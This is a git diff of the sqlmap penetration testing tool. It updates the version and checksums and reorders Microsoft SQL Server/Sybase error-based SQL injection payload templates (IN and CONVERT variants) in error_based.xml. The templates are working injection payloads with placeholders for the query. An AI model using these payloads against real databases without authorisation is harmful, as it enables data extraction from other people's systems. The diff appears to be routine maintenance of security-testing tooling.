diff --git a/lib/core/settings.py b/lib/core/settings.py index 47bbebd0e..77de16278 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from lib.core.revision import getRevisionNumber # sqlmap version (...) -VERSION = "1.0.10.17" +VERSION = "1.0.10.18" REVISION = getRevisionNumber() TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 35c32efff..dbda433ea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6 lib/core/readlineng.py 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py 99a2b496b9d5b546b335653ca801153f lib/core/revision.py 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py -03d99f9c043a47cb17f5a7b1fe053422 lib/core/settings.py +0537c742c135be19c8264e2e11f2ce6c lib/core/settings.py 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py c3ace7874a536d801f308cf1fd03df99 lib/core/target.py @@ -449,7 +449,7 @@ fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml 535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml -c136d8d2be59394e9221e2b732522d06 xml/payloads/error_based.xml +a9fdde4fda738a678ad2fa9fb718e833 xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml diff --git a/xml/payloads/error_based.xml b/xml/payloads/error_based.xml index 806ab82a6..6de3dc7dc 100644 --- a/xml/payloads/error_based.xml +++ b/xml/payloads/error_based.xml @@ -388,12 +388,54 @@ - Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) 2 1 1 1,9 1 + AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+ + + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) + 2 + 2 + 3 + 1,9 + 2 + OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+ + + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT) + 2 + 2 + 1 + 1,9 + 1 AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) @@ -409,9 +451,9 @@ - Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT) 2 - 1 + 3 3 1,9 2 @@ -471,48 +513,6 @@ - - Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) - 2 - 2 - 1 - 1,9 - 1 - AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Microsoft SQL Server - Sybase - Windows -
- - - - Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) - 2 - 2 - 3 - 1,9 - 2 - OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Microsoft SQL Server - Sybase - Windows -
- - Oracle AND error-based - WHERE or HAVING clause (XMLType) 2